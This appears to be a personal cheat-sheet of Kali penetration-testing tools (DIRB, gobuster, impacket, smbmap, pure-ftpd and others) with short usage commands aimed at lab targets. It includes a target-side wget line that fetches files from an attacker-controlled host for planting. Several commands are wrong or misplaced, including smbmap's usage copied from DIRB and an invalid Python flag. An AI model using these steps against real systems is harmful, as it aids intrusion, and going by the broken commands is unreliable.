Hacking Tools

descriptions of tools that may or may not be default in Kali

more at apt-secure.ca


base64 decode

This is how you translate base64 to readable

#echo "<base64 string>"== | base64 --decode

creating base64

#echo "string" | base64

BurpSuite

verbose details here link

DIRB

Web Content Scanner looks for existing (and/or hidden) web objects. Primary function is launching a dictionary based attack against a web server and analyzing the response

Usage: #dirb http://zyz.htb -r -z 10

davtest

tool that tests uploading files to a webdav vulnerable webserver

Usage: #davtest -url http://<ip>

getcap

Examine file capabilities. Displays the name and capabilities of each specified file

Usage: #getcap -r /

usage: #getcap -r / 2>/dev/null

gobuster

similar to DIRB, a directory brute forcer

  • you will need to install it

    • #apt-get install gobuster

usage:

"common.txt" at the location you see here was a special download, you can use whatever wordlist you want.

impacket:

Installation:

#sudo apt-get install python3-pip

#sudo git clone https://github.com/SecureAuthCorp/impacket.git /opt/impacket

Navigate to /opt/impacket

#sudo python3 ./setup.py install

pureFTPd

Used for transferring data between kali and target

INITIAL SETUP

On Kali

  • #apt-get install pure-ftpd

create ftp user

  • #useradd -g ftpgroup -d /dev/null -s /etc ftpuser

  • #pure-pw useradd jonny -u ftpuser -d /ftphome

  • #pure-pw mkdb

  • #cd /etc/pure-ftpd/auth/

  • #ln -S ../conf/PureDB 60pdb

inside /etc/pure-ftpd/auth

/etc/pure-ftpd/ > #mkdir -p /ftphome

  • #chown -R ftpuser:ftpgroup /ftphome/

  • #systemctl restart pure-ftpd

Check Status

#systemctl status pure-ftpd

USAGE

From target

#ftp <kali IP>

login and download


SecLists

this is a user made archive of a TON of scripts and various tools. It's insane

download like so.

#wget -c https://github.com/danielmiessler/SecLists/archive/master.zip -O SecList.zip

#unzip SecList.zip

#rm -f SecList.zip


SimpleHTTPServer (Python)

Used for file transfers between attacker and target. Typically there is something on the target you want to plant

Usage: Attacker Machine: #python -w SimpleHTTPServer <port #>

Usage: Target: #wget http://<attackerIP>:<port>/<desired_file>

smbmap

SMB enumeration tool. allows users to enumerate samba share drives across an entire domain. List share drives, drive permissions, share contents, upload/download, pattern matching, even execute remote commands

Usage: #dirb http://zyz.htb -r -z 10

tcpdump

dumps network traffic. used for analyzing traffic.

power usage link